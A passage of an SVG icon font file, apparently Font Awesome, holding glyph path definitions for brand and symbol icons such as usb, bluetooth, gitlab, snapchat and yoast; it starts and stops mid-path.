v32c0 2.60059 2 4.60059 4.60059 4.60059h27.3994c2.60059 0 4.60059 -2 4.60059 -4.60059v-32h36.5996v32c0 2.60059 2 4.60059 4.59961 4.60059h27.4004c2.59961 0 4.59961 -2 4.59961 -4.60059v-178.3h36.6006v32c0 2.59961 2 4.59961 4.59961 4.59961h27.4004z
M201.1 164.6v64c0 2.60059 -2 4.60059 -4.59961 4.60059h-27.4004c-2.59961 0 -4.59961 -2 -4.59961 -4.60059v-64c0 -2.59961 2 -4.59961 4.59961 -4.59961h27.4004c2.59961 0 4.59961 2 4.59961 4.59961zM347.5 164.6v64c0 2.60059 -2 4.60059 -4.59961 4.60059h-27.4004
c-2.59961 0 -4.59961 -2 -4.59961 -4.60059v-64c0 -2.59961 2 -4.59961 4.59961 -4.59961h27.4004c2.59961 0 4.59961 2 4.59961 4.59961z" />
    <glyph glyph-name="usb" unicode="&#xf287;" horiz-adv-x="641" 
d="M641.5 192c0 -3.09961 -1.7002 -6.09961 -4.5 -7.5l-89.0996 -53.5c-1.40039 -0.799805 -2.80078 -1.40039 -4.5 -1.40039c-1.40039 0 -3.10059 0.300781 -4.5 1.10059c-2.80078 1.7002 -4.5 4.5 -4.5 7.7998v35.5996h-238.7
c25.2998 -39.5996 40.5 -106.899 69.5996 -106.899h26.7002v26.7998c0 5 3.90039 8.90039 8.90039 8.90039h89.0996c5 0 8.90039 -3.90039 8.90039 -8.90039v-89.0996c0 -5 -3.90039 -8.90039 -8.90039 -8.90039h-89.0996c-5 0 -8.90039 3.90039 -8.90039 8.90039v26.6992
h-26.7002c-75.3994 0 -81.0996 142.5 -124.7 142.5h-100.3c-8.09961 -30.5996 -35.8994 -53.5 -69 -53.5c-39.2998 0.100586 -71.2998 32.1006 -71.2998 71.4004s32 71.2998 71.2998 71.2998c33.1006 0 61 -22.7998 69 -53.5c39.1006 0 43.9004 -9.5 74.6006 60.4004
c40.0996 89.0996 58.0996 82.0996 108.899 82.0996c7.5 20.9004 27 35.6006 50.4004 35.6006c29.5 0 53.5 -23.9004 53.5 -53.5c0 -29.6006 -23.9004 -53.5 -53.5 -53.5c-23.4004 0 -42.9004 14.7998 -50.4004 35.5996h-29.7998
c-29.0996 0 -44.2998 -67.4004 -69.5996 -106.9h310.1v35.6006c0 3.2998 1.7002 6.09961 4.5 7.7998s6.40039 1.40039 8.90039 -0.299805l89.0996 -53.5c2.7998 -1.10059 4.5 -4.10059 4.5 -7.2002z" />
    <glyph glyph-name="product-hunt" unicode="&#xf288;" horiz-adv-x="512" 
d="M326.3 229.2c0 -20.5 -16.7002 -37.2002 -37.2002 -37.2002h-70.2998v74.4004h70.2998c20.5 0 37.2002 -16.7002 37.2002 -37.2002zM504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM375.9 229.2
c0 47.8994 -38.9004 86.7998 -86.8008 86.7998h-119.899v-248h49.5996v74.4004h70.2998c47.9004 0 86.8008 38.8994 86.8008 86.7998z" />
    <glyph glyph-name="mixcloud" unicode="&#xf289;" horiz-adv-x="640" 
d="M424.43 228.271c42.3623 -9.1377 74.4805 -47.0693 74.4805 -92.2002c0 -52.3311 -42.6406 -94.6934 -94.9688 -94.6934h-289.614c-62.5752 0 -113.243 50.668 -113.243 112.966c0 56.7598 42.085 103.554 96.6299 111.582
c22.9814 67.5586 86.9395 114.074 159.205 114.074c87.2158 0 159.205 -66.7266 167.511 -151.729zM403.941 83.7412c29.0713 0 52.6064 23.5352 52.6064 52.3301c0 22.1494 -14.1211 40.9766 -33.502 48.4531c-1.38477 -8.58301 -3.59961 -17.166 -6.36914 -25.4727
c-8.01367 -25.6484 -49.0898 -14.2266 -40.1465 13.29c4.15332 12.7373 6.36914 26.0264 6.36914 39.5938c0 69.2197 -56.4834 125.702 -125.979 125.702c-49.8379 0 -94.6934 -29.626 -114.628 -73.9258c19.3809 -4.98438 37.3779 -14.9512 52.0527 -29.3486
c19.9531 -19.9531 -10.2168 -50.1436 -30.1797 -30.1807c-13.29 13.291 -31.0107 20.7666 -49.8379 20.7666c-39.04 0 -70.8809 -31.5645 -70.8809 -70.6045s31.8408 -70.6035 70.8809 -70.6035h289.614zM639.01 136.071c0 -44.0244 -12.7363 -86.3867 -37.1016 -122.657
c-4.15332 -6.0918 -10.7979 -9.41406 -17.7197 -9.41406c-16.3174 0 -27.1279 18.8262 -17.4434 32.9492c19.3809 29.3486 29.9033 63.6816 29.9033 99.1221c0 35.4395 -10.5215 69.7725 -29.9033 98.8447c-15.6553 22.8311 19.3613 47.2402 35.1631 23.5342
c24.3662 -35.9932 37.1016 -78.3564 37.1016 -122.379zM568.13 136.071c0 -31.5654 -9.13672 -62.0215 -26.8564 -88.3252c-4.15332 -6.09082 -10.7988 -9.13574 -17.7207 -9.13574c-17.2012 0 -27.0215 18.9785 -17.4424 32.9473
c13.0127 19.1045 19.6572 41.2559 19.6572 64.5137c0 22.9805 -6.64453 45.4072 -19.6572 64.5117c-15.7617 22.9863 19.0078 47.0947 35.1631 23.5352c17.7188 -26.0264 26.8564 -56.4834 26.8564 -88.0469z" />
    <glyph glyph-name="scribd" unicode="&#xf28a;" horiz-adv-x="384" 
d="M42.2998 195.3c-16.0996 19 -24.7002 45.9004 -24.7998 79.9004c0 100.399 75.2002 153.1 167.2 153.1c98.5996 1.60059 156.8 -49 184.3 -70.5996l-50.5 -72.1006l-37.2998 24.6006l26.8994 38.5996c-36.5 24 -79.3994 36.5 -123 35.7998
c-50.6992 0.800781 -111.699 -27.1992 -111.699 -76.1992c0 -18.7002 11.1992 -20.7002 28.5996 -15.6006c23.2998 5.2998 41.9004 -0.599609 55.7998 -14c26.4004 -24.2998 23.2002 -67.5996 -0.700195 -91.8994c-29.1992 -29.5 -85.1992 -27.3008 -114.8 8.39941z
M360 189.4c33.9004 -40.4004 36.7998 -138.2 -20.2998 -189.601c-39.2002 -33.5996 -82.2002 -44.0996 -133.601 -44.0996c-70.2998 -0.299805 -138.199 25.3994 -190.699 72.2002l-15.4004 13.7998l60.7998 71.7998l35.6006 -27.4004l-33.7002 -39.3994
c41.7002 -30.9004 92.2002 -47.5 144.1 -47.2998c61.9004 0 104.7 23.5 121.4 64.3994c0.899414 4.2002 1.39941 8.40039 1.39941 12.7002c0 18.7002 -11.1992 20.7002 -28.5996 15.5996c-23.2998 -5.2998 -42.2002 0.5 -56.2998 14.4004
c-12.4004 11.2998 -19.1006 27.5 -18.4004 44.2998c-0.599609 39.2002 32.4004 69.2002 70.5 67.2002c24.2998 0.799805 47.7002 -9.7998 63.2002 -28.5996z" />
    <glyph glyph-name="bluetooth" unicode="&#xf293;" 
d="M292.6 276.9l-42.8994 -42.9004l-0.299805 86zM249.4 57.0996l0.199219 86l42.9004 -42.8994zM416 188.6c0 -205.6 -71.9004 -252.6 -185.1 -252.6c-113.2 0 -198.9 47 -198.9 252.6c0 205.601 83.4004 259.4 196.6 259.4c113.2 0 187.4 -53.9004 187.4 -259.4z
M257.5 188.6l79.4004 88.6006l-125.101 134.3v-176.9l-73.7998 73.8008l-27 -26.9004l92.7002 -93l-92.7002 -93l26.9004 -26.9004l73.7998 73.8008l2.2998 -170l127.4 127.5z" />
    <glyph glyph-name="bluetooth-b" unicode="&#xf294;" horiz-adv-x="320" 
d="M196.48 187.977l97.9111 -103.333l-148.552 -148.644l-2.71484 198.284l-86.1113 -86.1113l-31.4053 31.4053l108.061 108.398l-108.061 108.399l31.4053 31.4053l86.1113 -86.1113v206.33l145.981 -156.69zM237.34 290.973l-50.3145 50.3174l0.337891 -100.295z
M187.363 134.96l-0.337891 -100.294l50.3145 50.3164z" />
    <glyph glyph-name="gitlab" unicode="&#xf296;" horiz-adv-x="512" 
d="M105.2 423.1c0 0 56.5 -174.8 56.5996 -174.8h-132l56.5 174.8c3.2002 8.90039 15.7998 8.90039 18.9004 0zM0.900391 160.3l28.7998 88l226.2 -294l-247.9 184c-6.7998 5.10059 -9.7002 14 -7.09961 22zM161.7 248.3h188.6l-94.2998 -294zM511.1 160.3
c2.5 -8 -0.299805 -16.8994 -7.19922 -22l-247.9 -184l226.3 294zM425.7 423.1l56.5 -174.8h-132l56.5996 174.8c3.2002 8.90039 15.7998 8.90039 18.9004 0z" />
    <glyph glyph-name="wpbeginner" unicode="&#xf297;" horiz-adv-x="511" 
d="M462.799 125.626c56.2109 -64.3076 4.16211 -157.626 -91.8545 -157.626c-39.6025 0 -78.8242 17.6865 -100.143 50.04c-6.88672 -0.356445 -22.7021 -0.356445 -29.5898 0c-21.3643 -32.4209 -60.624 -50.04 -100.143 -50.04
c-95.4902 0 -148.349 92.9961 -91.8555 157.626c-79.1387 131.851 31.2646 290.374 206.792 290.374c175.632 0 285.87 -158.626 206.793 -290.374zM123.152 208.598h41.5283v58.0752h-41.5283v-58.0752zM340.332 122.526v23.8389
c-60.5059 -20.915 -132.355 -9.19824 -187.589 33.9707l0.246094 -24.8965c51.1006 -46.3672 131.746 -57.875 187.343 -32.9131zM189.579 208.598h166.058v58.0752h-166.058v-58.0752z" />
    <glyph glyph-name="wpforms" unicode="&#xf298;" 
d="M448 372.8v-361.7c0 -24.2998 -19 -43.1992 -43.2002 -43.1992h-361.6c-23.9004 0.0996094 -43.2002 18.6992 -43.2002 43.2998v361.6c0 24.1006 18.7998 43.2002 43.2002 43.2002h361.7c24 0 43.0996 -18.7998 43.0996 -43.2002zM410.7 11.2002v361.6
c0 3 -2.60059 5.7998 -5.7998 5.7998h-9.30078l-110.3 -74.5996l-61.2998 49.9004l-61.2002 -49.9004l-110.3 74.7002h-9.2998c-3.2002 0 -5.7998 -2.7998 -5.7998 -5.7998v-361.7c0 -3 2.59961 -5.7998 5.7998 -5.7998h361.7
c3.19922 -0.100586 5.7998 2.69922 5.7998 5.7998zM150.2 262v-37h-73.5v37h73.5zM150.2 187.6v-37.2998h-73.5v37.2998h73.5zM161.3 334.9l54 43.6992h-118.5zM371.3 262v-37h-196v37h196zM371.3 187.6v-37.2998h-196v37.2998h196zM286.7 334.9l64.5 43.6992h-118.4z
M371.3 113v-37.2998h-99.3994v37.2998h99.3994z" />
    <glyph glyph-name="envira" unicode="&#xf299;" 
d="M0 416c477.6 0 366.6 -317.3 367.1 -366.3l80.9004 -81.7002h-26l-70.4004 71.2002c-39 -4.2002 -124.399 -34.5 -214.399 37c-90.2002 71.5 -85.2002 157.1 -137.2 339.8zM79.7002 370c-49.7002 23.5 -5.2002 -9.2002 -5.2002 -9.2002
c45.2002 -31.2002 66 -73.7002 90.2002 -119.899c31.5 -60.2002 79 -139.7 144.2 -167.7c65 -28 34.1992 -12.5 6 8.5c-28.2002 21.2002 -68.2002 87 -91 130.2c-31.7002 60 -61 118.6 -144.2 158.1z" />
    <glyph glyph-name="glide" unicode="&#xf2a5;" 
d="M252.8 299.4c0 -8.80078 -1.59961 -17.7002 -3.39941 -26.4004c-5.80078 -27.7998 -11.6006 -55.7998 -17.3008 -83.5996c-1.39941 -6.30078 -8.2998 -4.90039 -13.6992 -4.90039c-23.8008 0 -30.5 26 -30.5 45.5c0 29.2998 11.1992 68.0996 38.5 83.0996
c4.2998 2.5 9.19922 4.2002 14.0996 4.2002c11.4004 0 12.2998 -8.2998 12.2998 -17.8994zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM384 181c0 5.09961 -20.7998 37.7002 -25.5 39.5
c-2.2002 0.900391 -7.2002 2.2998 -9.59961 2.2998c-23.1006 0 -38.7002 -10.5 -58.2002 -21.5l-0.5 0.5c4.2998 29.4004 14.5996 57.2002 14.5996 87.4004c0 44.5996 -23.7998 62.7002 -67.5 62.7002c-71.7002 0 -108 -70.8008 -108 -123.5c0 -54.7002 32 -85 86.2998 -85
c7.5 0 6.90039 0.599609 6.90039 -2.30078c-10.5 -80.2998 -56.5 -82.8994 -56.5 -58.8994c0 24.3994 28 36.5 28.2998 38c-0.200195 7.59961 -29.2998 17.2002 -36.7002 17.2002c-21.0996 0 -32.6992 -33 -32.6992 -50.6006c0 -32.2998 20.3994 -54.7002 53.2998 -54.7002
c48.2002 0 83.3994 49.7002 94.2998 91.7002c9.40039 37.7002 7 39.4004 12.2998 42.1006c20 10.0996 35.7998 16.7998 58.4004 16.7998c11.0996 0 19 -2.2998 36.7002 -5.2002c1.7998 -0.0996094 4.09961 1.7002 4.09961 3.5z" />
    <glyph glyph-name="glide-g" unicode="&#xf2a6;" horiz-adv-x="480" 
d="M407.1 236.8c7.5 -2.89941 40.9004 -55.3994 40.9004 -63.3994c0 -2.90039 -3.7998 -5.80078 -6.7002 -5.80078c-28.3994 4.7002 -41.0996 8.40039 -58.8994 8.40039c-36.3008 0 -61.6006 -10.7998 -93.8008 -27c-8.5 -4.2998 -4.59961 -7.09961 -19.6992 -67.5996
c-17.4004 -67.6006 -74 -145.4 -151.4 -145.4c-52.7002 0 -85.5 36 -85.5 87.9004c0 28.0996 18.5 79.1992 52.4004 79.2998c11.8994 0 58.5996 -15.4004 58.8994 -27.6006c-0.5 -2.39941 -45.5 -21.7998 -45.5 -61c0 -38.5 73.9004 -34.2998 90.7998 94.6006
c0 4.7998 1 3.7998 -11 3.7998c-87.2998 0 -138.6 48.7002 -138.6 136.6c0 84.7002 58.2998 198.4 173.4 198.4c70.1992 0 108.399 -29.0996 108.399 -100.6c0 -48.5 -16.5 -93.1006 -23.5 -140.4l0.900391 -0.900391c31.2998 17.7002 56.3994 34.5 93.5 34.5
c3.7998 0 11.8994 -2.39941 15.3994 -3.7998zM231.8 321.2c2.90039 13.8994 5.5 28.0996 5.60059 42.3994c0 15.4004 -1.40039 28.7002 -20 28.7002c-7.80078 0 -15.6006 -2.59961 -22.6006 -6.7002c-43.7998 -24.0996 -61.7998 -86.3994 -61.7998 -133.399
c0 -31.2998 10.7002 -73.1006 49 -73.1006c8.7002 0 19.7002 -2.39941 22 7.80078c9.2002 44.6992 18.5 89.5996 27.7998 134.3z" />
    <glyph glyph-name="viadeo" unicode="&#xf2a9;" horiz-adv-x="447" 
d="M276.2 297.5v-0.700195c-17.9004 52.6006 -42.6006 103.4 -70.7998 151.2c43.2998 -29.2002 67 -100 70.7998 -150.5zM308.9 175.8c15.0996 3.10059 29.5 9 42.1992 17c24.5 -58.5996 20.2002 -139.7 -36.3994 -201c-67.7998 -73.8994 -191.9 -74.5996 -259.8 0
c-108.801 117.8 -31.6006 313.7 129.899 313.7c21.2998 0 42.6006 -3.5 62.5 -10.7002c-6.89941 -13.3994 -11.7002 -28.2002 -13.3994 -43.2998c-15.4004 6.5 -32.3008 9.59961 -49.1006 9.59961c-78 0 -135.399 -66.6992 -135.399 -142.3
c0 -68.7998 45.5996 -126 111.3 -137.399c98.5 38.3994 116.6 188.199 116.6 280c0 11.6992 0 23.6992 -1 35.3994c12.4004 -36.0996 18.9004 -73.8994 18.9004 -112c0 -86.5 -35.1006 -158.399 -109.3 -205.1l-3.80078 -0.299805
c80 -1.60059 137.801 61.6992 137.801 139.399c0 19.5 -3.40039 38.7998 -11 57zM418.1 436.3c52 -74 20.9004 -208.6 -58.0996 -208.6c-21.2998 0 -40.2002 11.3994 -55 25.7998c35.0996 19.2998 79.4004 49.2002 99.7002 84.9004
c2.39941 4.7998 6.5 13.6992 7.2002 19.1992c-19.9004 -44.6992 -70.8008 -79.6992 -118.2 -90.6992c-7.5 11.6992 -12 24.6992 -12 38.7998c0 16.5 8.2002 38.5 20.5996 50.5c34.5 32.8994 84.7998 13.5996 115.8 80.0996z" />
    <glyph glyph-name="viadeo-square" unicode="&#xf2aa;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM280.7 66.7998c35.3994 38.2998 38.0996 89 22.7998 125.601c-7.90039 -4.90039 -16.9004 -8.60059 -26.4004 -10.5
c4.80078 -11.4004 6.90039 -23.5 6.90039 -35.7002c0 -48.6006 -36.2002 -88.2002 -86.2002 -87.2002l2.40039 0.200195c46.3994 29.2002 68.2998 74.0996 68.2998 128.2c0 23.7998 -4.09961 47.5 -11.7998 70v0.399414c-2.2998 31.6006 -17.1006 75.7998 -44.2002 94.1006
c17.5996 -29.9004 33 -61.6006 44.2002 -94.5c0.599609 -7.30078 0.599609 -14.8008 0.599609 -22.1006c0 -57.3994 -11.3994 -151 -72.8994 -175c-41 7.2002 -69.5 42.9004 -69.5 85.9004c0 47.2002 35.7998 88.8994 84.5996 88.8994c10.5 0 21 -1.89941 30.7002 -6
c1.09961 9.5 4.09961 18.7002 8.39941 27.1006c-12.5 4.59961 -25.7998 6.7002 -39.0996 6.7002c-101 0 -149.2 -122.5 -81.2002 -196.101c42.4004 -46.5996 120 -46.2002 162.4 0zM309 214.3c49.4004 0 68.7998 84.1006 36.2998 130.3
c-19.3994 -41.5 -50.7998 -29.5 -72.3994 -50c-7.7002 -7.5 -12.9004 -21.2998 -12.9004 -31.5996c0 -8.7998 2.7998 -17 7.5 -24.2998c29.7002 6.89941 61.4004 28.7998 73.9004 56.7002c-0.400391 -3.40039 -3 -9 -4.5 -12c-12.7002 -22.3008 -40.4004 -41 -62.3008 -53
c9.30078 -9 21.1006 -16.1006 34.4004 -16.1006z" />
    <glyph glyph-name="snapchat" unicode="&#xf2ab;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM417.5 101.1c2.2002 5.30078 -0.900391 9.80078 -4.90039 10.8008c-46.2998 7.59961 -67.0996 55.0996 -68 57.0996
c-0.0996094 0.0996094 -0.0996094 0.200195 -0.199219 0.299805c-2.40039 5 -3 9.2002 -1.60059 12.5c2.60059 6.2998 12.5 9.40039 19 11.5c1.7998 0.600586 3.5 1.10059 4.90039 1.7002c11.5 4.5 17.2998 10.0996 17.2002 16.5996
c-0.100586 5.10059 -4.10059 9.60059 -10.4004 11.9004c-4 1.59961 -9.59961 1.90039 -13.5996 0c-5.5 -2.59961 -10.4004 -4 -14.7002 -4.2002c-2.7998 0.100586 -4.60059 0.799805 -5.7002 1.40039c1.40039 24 4.7002 58 -3.7998 77.0996
c-16.2998 36.5 -49.6006 54.2998 -84.2998 54.2998c-0.600586 0 -6.10059 -0.0996094 -6.7002 -0.0996094c-14 0 -61.6006 -4 -84.1006 -54.2998c-8.5 -19.1006 -5.19922 -53.2002 -3.7998 -77.1006c-1.09961 -0.599609 -3.2998 -1.39941 -6.59961 -1.39941
c-4.5 0 -9.7998 1.39941 -15.7002 4.2002c-7.5 3.5 -20.2998 -1.80078 -21.9004 -10.3008c-1 -4.89941 1.2002 -12.0996 17 -18.2998c6.10059 -2.5 20.6006 -5.2998 24 -13.2002c1.40039 -3.2998 0.900391 -7.5 -1.59961 -12.5
c-0.0996094 -0.0996094 -0.200195 -0.199219 -0.200195 -0.299805c-0.899414 -2 -21.7002 -49.5 -68 -57.0996c-3.59961 -0.600586 -6.09961 -3.7998 -5.89941 -7.40039c0.699219 -13.8994 31.6992 -19.2998 45.5 -21.3994c1.39941 -1.90039 2.5 -9.90039 4.2998 -16
c0.799805 -2.7002 2.89941 -6 8.2998 -6s13.2998 3.09961 25.7998 3.09961c17.6006 0 23.6006 -4 37.4004 -13.7002c9.89941 -7 27.5 -19.7998 48.5 -18.2002c20.7998 -0.899414 34.7002 7.90039 49.2002 18.2002c13.6992 9.7002 19.7998 13.7002 37.3994 13.7002
c13 0 19.6006 -2.90039 25.7998 -2.90039h0.200195c4.40039 0 7 2.2002 8.10059 5.90039c1.7998 6.09961 2.89941 14 4.2998 15.9004c26.7002 4.19922 41.2998 10.0996 44.7998 18.1992z" />
    <glyph glyph-name="snapchat-ghost" unicode="&#xf2ac;" horiz-adv-x="512" 
d="M510.846 55.3271c-5.21094 -12.1572 -27.2383 -21.0889 -67.3594 -27.3184c-2.06445 -2.78613 -3.77539 -14.6855 -6.50781 -23.9561c-1.625 -5.56543 -5.62207 -8.86914 -12.1279 -8.86914l-0.296875 0.00585938c-9.39453 0 -19.2031 4.32227 -38.8516 4.32227
c-26.5215 0 -35.6621 -6.04297 -56.2539 -20.5879c-21.832 -15.4375 -42.7715 -28.7637 -74.0273 -27.3984c-31.6455 -2.33398 -58.0244 16.9072 -72.8711 27.4033c-20.7139 14.6436 -29.8281 20.582 -56.2412 20.582c-18.8633 0 -30.7354 -4.71973 -38.8516 -4.71973
c-8.07324 0 -11.2129 4.92188 -12.4219 9.04004c-2.70312 9.18848 -4.4043 21.2627 -6.52344 24.1299c-20.6787 3.20898 -67.3096 11.3438 -68.498 32.1504c-0.00878906 0.161133 -0.015625 0.422852 -0.015625 0.583984c0 4.97559 3.98438 9.67285 8.89258 10.4844
c69.583 11.4551 100.925 82.9014 102.228 85.9346c0.0742188 0.175781 0.155273 0.34375 0.237305 0.514648c3.71289 7.53711 4.54395 13.8486 2.46289 18.7529c-5.05078 11.8965 -26.8721 16.1641 -36.0537 19.7959c-23.7148 9.36621 -27.0146 20.1279 -25.6113 27.5039
c2.43652 12.8359 21.7246 20.7354 33.002 15.4531c8.91895 -4.18066 16.8428 -6.29688 23.5469 -6.29688c5.02148 0 8.21191 1.2041 9.95996 2.1709c-2.04297 35.9365 -7.10156 87.29 5.68652 115.969c33.7734 75.7188 105.356 81.6025 126.478 81.6025
c0.943359 0 9.14062 0.0888672 10.1094 0.0888672c52.1484 0 102.255 -26.7803 126.724 -81.6426c12.7764 -28.6504 7.74902 -79.792 5.69434 -116.01c1.58203 -0.87207 4.35742 -1.94141 8.59961 -2.13867c6.39648 0.286133 13.8145 2.38867 22.0693 6.25684
c6.08496 2.84668 14.4053 2.46094 20.4795 -0.0576172l0.0292969 -0.00976562c9.47559 -3.38574 15.4385 -10.2158 15.5889 -17.8701c0.183594 -9.74707 -8.52246 -18.165 -25.8779 -25.0186c-2.11816 -0.834961 -4.69434 -1.6543 -7.43457 -2.52441
c-9.79688 -3.10645 -24.5996 -7.80566 -28.6152 -17.2715c-2.0791 -4.9043 -1.25684 -11.2109 2.45996 -18.748c0.0869141 -0.167969 0.166016 -0.341797 0.238281 -0.514648c1.30176 -3.03027 32.6152 -74.46 102.23 -85.9346
c6.42676 -1.05762 11.1631 -7.87695 7.72461 -15.8584z" />
    <glyph glyph-name="snapchat-square" unicode="&#xf2ad;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM393.5 101.1c2.2002 5.30078 -0.900391 9.80078 -4.90039 10.8008c-46.2998 7.59961 -67.0996 55.0996 -68 57.0996
c-0.0996094 0.0996094 -0.0996094 0.200195 -0.199219 0.299805c-2.40039 5 -3 9.2002 -1.60059 12.5c2.60059 6.2998 12.5 9.40039 19 11.5c1.7998 0.600586 3.5 1.10059 4.90039 1.7002c11.5 4.5 17.2998 10.0996 17.2002 16.5996
c-0.100586 5.10059 -4.10059 9.60059 -10.4004 11.9004c-4 1.59961 -9.59961 1.90039 -13.5996 0c-5.5 -2.59961 -10.4004 -4 -14.7002 -4.2002c-2.7998 0.100586 -4.60059 0.799805 -5.7002 1.40039c1.40039 24 4.7002 58 -3.7998 77.0996
c-16.2998 36.5 -49.6006 54.2998 -84.2998 54.2998c-0.600586 0 -6.10059 -0.0996094 -6.7002 -0.0996094c-14 0 -61.6006 -4 -84.1006 -54.2998c-8.5 -19.1006 -5.19922 -53.2002 -3.7998 -77.1006c-1.09961 -0.599609 -3.2998 -1.39941 -6.59961 -1.39941
c-4.5 0 -9.7998 1.39941 -15.7002 4.2002c-7.5 3.5 -20.2998 -1.80078 -21.9004 -10.3008c-1 -4.89941 1.2002 -12.0996 17 -18.2998c6.10059 -2.5 20.6006 -5.2998 24 -13.2002c1.40039 -3.2998 0.900391 -7.5 -1.59961 -12.5
c-0.0996094 -0.0996094 -0.200195 -0.199219 -0.200195 -0.299805c-0.899414 -2 -21.7002 -49.5 -68 -57.0996c-3.59961 -0.600586 -6.09961 -3.7998 -5.89941 -7.40039c0.699219 -13.8994 31.6992 -19.2998 45.5 -21.3994c1.39941 -1.90039 2.5 -9.90039 4.2998 -16
c0.799805 -2.7002 2.89941 -6 8.2998 -6s13.2998 3.09961 25.7998 3.09961c17.6006 0 23.6006 -4 37.4004 -13.7002c9.89941 -7 27.5 -19.7998 48.5 -18.2002c20.7998 -0.899414 34.7002 7.90039 49.2002 18.2002c13.6992 9.7002 19.7998 13.7002 37.3994 13.7002
c13 0 19.6006 -2.90039 25.7998 -2.90039h0.200195c4.40039 0 7 2.2002 8.10059 5.90039c1.7998 6.09961 2.89941 14 4.2998 15.9004c26.7002 4.19922 41.2998 10.0996 44.7998 18.1992z" />
    <glyph glyph-name="pied-piper" unicode="&#xf2ae;" 
d="M32 29l-32 -60.2002l0.799805 328c0 65.9004 53.2002 119.2 119.2 119.2h327.2c-93 -28.9004 -189.9 -94.2002 -253.9 -168.6c-70.5996 -81.4004 -110.7 -137.4 -161.3 -218.4zM448 416c0 0 0 -328.8 0.0996094 -328.8c0 -65.9004 -53.2998 -119.2 -119.3 -119.2
h-328.399c18.5 25.5 61.6992 54 84.8994 66c35.5 18.0996 76.4004 28.5 105.3 56.2998c42.1006 40.5 47.8008 105 71 158.601c43.6006 100.3 186.4 167.1 186.4 167.1z" />
    <glyph glyph-name="first-order" unicode="&#xf2b0;" 
d="M12.9004 218.8c0.0996094 0.100586 0.199219 0.299805 0.299805 0.400391c0 -0.100586 0 -0.299805 -0.100586 -0.400391h-0.199219zM224 351.4c7.40039 0 14.5996 -0.5 21.7002 -1.7002l-4 -67.7002l22.2998 64.2998c14.2998 -3.7998 27.7002 -9.5 40 -16.8994
l-29.4004 -61.1006l45.1006 50.9004c11.5 -8.90039 21.7002 -19.2002 30.5996 -30.9004l-50.5996 -45.3994l60.8994 29.6992c7.5 -12.2998 12.9004 -26 16.6006 -40.2998l-64 -22.2998l67.7002 4c1.09961 -7.09961 1.39941 -14.5996 1.39941 -22
s-0.299805 -14.5996 -1.39941 -21.7002l-67.4004 4l64 -22.2998c-3.7002 -14.5996 -9.5 -28 -16.5996 -40.2998l-61.1006 29.3994l50.6006 -45.0996c-8.60059 -11.7998 -18.9004 -22 -30.6006 -30.9004l-44.8994 50.9004l29.3994 -61.2998
c-12.2998 -7.5 -25.7002 -12.9004 -40 -16.9004l-22.5996 65.1006l4 -68.6006c-7.10059 -1.09961 -14.2998 -1.7002 -21.7002 -1.7002c-7.09961 0 -14.5996 0.600586 -21.7002 1.7002l4 68l-22.2998 -64.5996c-14.2998 3.7998 -27.7002 9.5 -40 16.8994l29.5 61.4004
l-44.9004 -50.9004c-11.7998 8.60059 -22 19.2002 -30.8994 30.9004l50.8994 45.0996l-61.0996 -29.6992c-7.2002 12.5996 -12.9004 26 -16.5996 40.2998l64 22.5996l-67.7002 -4c-0.799805 7.10059 -1.40039 14.2998 -1.40039 21.7002s0.5 14.9004 1.40039 22l68 -4
l-64.2998 22.5996c3.69922 14.3008 9.5 27.7002 16.5996 40l61.0996 -29.6992l-50.5996 45.3994c8.90039 11.7998 19.2002 22 30.5996 30.9004l45.1006 -50.9004l-29.4004 61.4004c12.2998 7.2002 25.7002 12.8994 40 16.5996l22 -64l-3.7002 67.4004
c6.80078 1.09961 14.3008 1.7002 21.4004 1.7002zM443.4 320v-256l-219.4 -128l-219.4 128v256l219.4 128zM426.3 309.7l-202.3 117.399l-202.3 -117.399v-235.101l202.3 -117.699l202.3 117.699v235.101zM224 410.9l187.7 -109.4v-218.9l-187.7 -109.5l-187.7 109.5
v218.801zM224 360c-92.2998 0 -166.9 -75.0996 -166.9 -168c0 -92.5996 74.6006 -167.7 166.9 -167.7c92 0 166.9 75.1006 166.9 167.7c0 92.9004 -74.9004 168 -166.9 168z" />
    <glyph glyph-name="yoast" unicode="&#xf2b1;" 
d="M91.2998 372h186l-7 -18.9004h-179c-39.7002 0 -71.8994 -31.5996 -71.8994 -70.2998v-205.399c0 -35.4004 24.8994 -70.3008 84 -70.3008v-19.0996h-12.1006c-50.0996 0 -91.2998 40.2002 -91.2998 89.5v205.3c0 49.2998 40.7002 89.2002 91.2998 89.2002zM320.4 428
h66.5c-143.801 -378.1 -145.7 -398.9 -184.7 -439.3c-20.7998 -21.6006 -49.2998 -31.7002 -78.2998 -32.7002v51.0996c49.1992 7.7002 64.5996 49.9004 64.5996 75.3008c0 20.0996 0.599609 12.5996 -82.0996 223.199h61.3994l50.4004 -156.6zM448 286.5v-298.5h-214
c6.59961 9.59961 10.7002 16.2998 12.0996 19.4004h182.5v279.1c0 32.5 -17.0996 51.9004 -48.1992 62.9004l6.69922 17.5996c41.7002 -13.5996 60.9004 -43.0996 60.9004 -80.5z" />
    <glyph glyph-name="themeisle" unicode="&#xf2b2;" horiz-adv-x="512" 
d="M208 359.714c0 10 6.28613 21.7139 17.7148 21.7139c11.1426 0 17.7139 -11.7139 17.7139 -21.7139c0 -10.2852 -6.57129 -21.7139 -17.7139 -21.7139c-11.4287 0 -17.7148 11.4287 -17.7148 21.7139zM512 199.714c0 -36.001 -11.4287 -102.286 -36.2861 -129.714
c-22.8574 -24.8584 -87.4277 -61.1426 -120.856 -70.5723l-1.14355 -0.286133v-32.5703c0 -16.2861 -12.5723 -30.5713 -29.1426 -30.5713c-10 0 -19.4297 5.71387 -24.5723 14.2861c-5.42676 -8.57227 -14.8564 -14.2861 -24.8564 -14.2861
